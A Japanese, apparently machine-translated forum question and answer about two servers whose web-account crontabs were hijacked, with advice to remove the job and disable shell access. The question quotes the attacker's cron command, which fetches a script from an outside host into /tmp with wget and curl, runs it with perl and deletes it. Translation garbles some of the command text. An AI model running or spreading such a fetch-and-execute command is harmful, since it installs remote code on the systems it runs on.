数日前から、不明な cron ジョブの実行に関する通知が送られてくるようになった専用サーバーが 2 台あります。
両方のサーバーに Web サイト用のセカンダリ アカウントがあり、ハッカーは root ではなくそれらのアカウントの cron ジョブを変更しました。そのため、ハッカーは「おそらく」制限されたアクセス権しか持っていないのではないかと思います。
どちらも以下を実行しようとしています: cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;カール-おhttp://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
最初のサーバーからの Cronjob 出力:
http://pastebin.com/m56ga6pp
2 番目のサーバーからの Cronjob 出力:
http://pastebin.com/4utZ8agC
奇妙なのは、両方のサーバーが同時に同じ方法でハッキングされたように見えることです。
まさにこのようなハッキングをしたことがある人は、どうやって侵入したのか、再インストールせずに削除できるかどうかについてアイデアをくれる人はいませんか?
サーバーには多数の Web サイトがあり、最初の Web サイトは約 500 GB を使用しているため、これを別の場所に移動して再インストールするにはかなりの時間がかかります。
前もって感謝します!
答え1
pastebin の出力を見ると、cron ジョブがハッシュを生成しようとしているようです。この人物は、サーバーを暗号通貨のマイニング プールの一部として使用しようとしているのではないかと疑っています。
侵入方法の詳細については、さまざまなログが必要ですが、Web サイトの所有者が侵入したのではないと 100% 確信していますか? cronjob は簡単に削除できます。
crontab -e
ユーザーが再びログインできないようにするには、特定のユーザーにシェル アクセスを許可する理由がない場合は、そのユーザーのシェル アクセスを無効にします。
chsh -s /sbin/nologin {username}